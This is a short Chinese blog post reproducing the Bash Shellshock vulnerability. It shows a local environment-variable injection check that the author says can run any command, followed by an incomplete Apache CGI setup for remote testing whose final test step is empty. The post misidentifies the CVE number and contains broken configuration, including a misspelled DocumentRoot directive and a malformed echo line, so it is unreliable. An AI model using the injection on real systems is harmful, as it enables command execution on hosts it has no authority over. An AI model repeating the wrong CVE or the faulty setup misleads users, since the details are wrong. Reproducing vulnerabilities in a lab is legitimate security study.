您的位置:首页 > 运维架构 > Shell

Bash Shellshock(cve-2014-6217)漏洞简单复现

2020-01-14 20:20 996 查看

Bash Shellshock(cve-2014-6217)漏洞简单复现

关于这个漏洞,我主要讲两个验证方法。一是本地验证方法,二是远程模拟验证方法。

1:本地验证

直接在shell中输入执行以下命令: env x=’(){ :;}; echo Vulnerable CVE-2014-6217 ’ bash -c “echo test”
如果显示echo Vulnerable CVE-2014-6217,就证明系统存在该漏洞。可将"echo Vulnerable CVE-2014-6217"改为任意命令进行执行。
验证成功!

2:远程模拟验证

1:安装apache2
使用命令: sudo apt-get install apache2
2:打开配置文件#sudo vi /etc/apache2/sites-enabled/000-default
修改配置语句:
DocumentsRoot /var/www/html
ScriptAlias /cgi-bin/ /var/www/html/cgi-bin/
3:编辑服务端测试文件:
#sudo vi /var/www/html/cgi-bin/test.sh(记得提前创建好路径)
内容:
#!/bin/bash
echo"Content-type:text/html"
echo""
4:重启服务
#sudo /etc/init.d/apache2 restart
5:进行测试

  • 点赞
  • 收藏
  • 分享
  • 文章举报
cj‘s link 发布了3 篇原创文章 · 获赞 0 · 访问量 43 私信 关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: